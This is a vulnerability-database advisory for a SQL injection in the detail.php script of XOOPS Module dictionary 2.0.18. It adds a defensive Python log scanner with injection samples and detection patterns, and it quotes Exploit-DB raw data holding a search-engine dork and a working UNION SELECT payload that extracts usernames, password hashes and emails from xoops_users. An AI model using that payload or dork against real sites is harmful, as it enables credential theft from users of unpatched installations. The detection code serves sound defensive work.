vendor: XOOPS Module dictionary
by: Palyo34
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: XOOPS Module dictionary
Affected Version From: 2.0.18
Affected Version To: 2.0.18
Patch Exists: Yes
Related CWE: N/A
CPE: a:xoops:xoops_module_dictionary
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability

The vulnerability exists in XOOPS Module dictionary 2.0.18, which allows an attacker to inject malicious SQL queries via the 'id' parameter in the 'detail.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script, which will then execute the injected SQL query.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of XOOPS Module dictionary.
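
One way to look for requests that abuse the 'id' parameter of 'detail.php' in web server logs, as an added example that is not part of the original advisory or of the XOOPS code base. It assumes a combined-format access log and that legitimate 'id' values are plain non-negative integers; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path taken from the advisory; the access-log layout is an assumption.
VULN_PATH = "/modules/dictionary/detail.php"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_TOKENS = re.compile(
    r"\b(union|select|from|concat(?:_ws)?|sleep|benchmark)\b|--|/\*|0x[0-9a-f]+", re.I)

SAMPLE_LOG = [  # constructed lines using documentation-range addresses
    '192.0.2.10 - - [01/Jan/2009:10:00:00 +0000] "GET /modules/dictionary/detail.php?id=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2009:10:00:05 +0000] "GET /modules/dictionary/detail.php?id=-885+union+select+1,2,3,4,5,6-- HTTP/1.1" 200 4871',
    '198.51.100.7 - - [01/Jan/2009:10:00:09 +0000] "GET /modules/dictionary/detail.php?id=1%27 HTTP/1.1" 200 310',
    '192.0.2.10 - - [01/Jan/2009:10:00:12 +0000] "GET /modules/news/article.php?id=7 HTTP/1.1" 200 900',
]

def classify_id(value):
    """Return 'ok' for a plain integer id, 'sqli' if SQL syntax is present, else 'malformed'."""
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    if SQL_TOKENS.search(value):
        return "sqli"
    return "malformed"

def scan(lines):
    """Return (line_no, verdict, decoded_id) for detail.php requests whose id is not a plain integer."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(VULN_PATH):
            continue  # only the script named in the advisory is in scope
        # parse_qs percent-decodes the value and turns '+' into a space
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            verdict = classify_id(value.strip())
            if verdict != "ok":
                findings.append((no, verdict, value))
    return findings

if __name__ == "__main__":
    for no, verdict, value in scan(SAMPLE_LOG):
        print(f"line {no}: {verdict}: id={value!r}")
```

A 'sqli' hit with a 200 response on an unpatched install is worth treating as a possible disclosure of the users table rather than a blocked probe.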
Source

Exploit-DB raw data:

##########################################
#
#  XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability
#
#  XOOPS Version:  XOOPS 2.0.18 
#
#  http://www.xoops.org/modules/repository/
#
##########################################
#
# AUTHOR : Palyo34
#
# HOME : http://www.1923turk.biz
#
#
###########################################
#
# DORK  : allinurl: "modules/dictionary/detail.php?id"
#
###########################################
#   
#   EXPLOIT :
#
#     modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,uid,uname,pass,email),5,6+from+xoops_users--
#
##############################################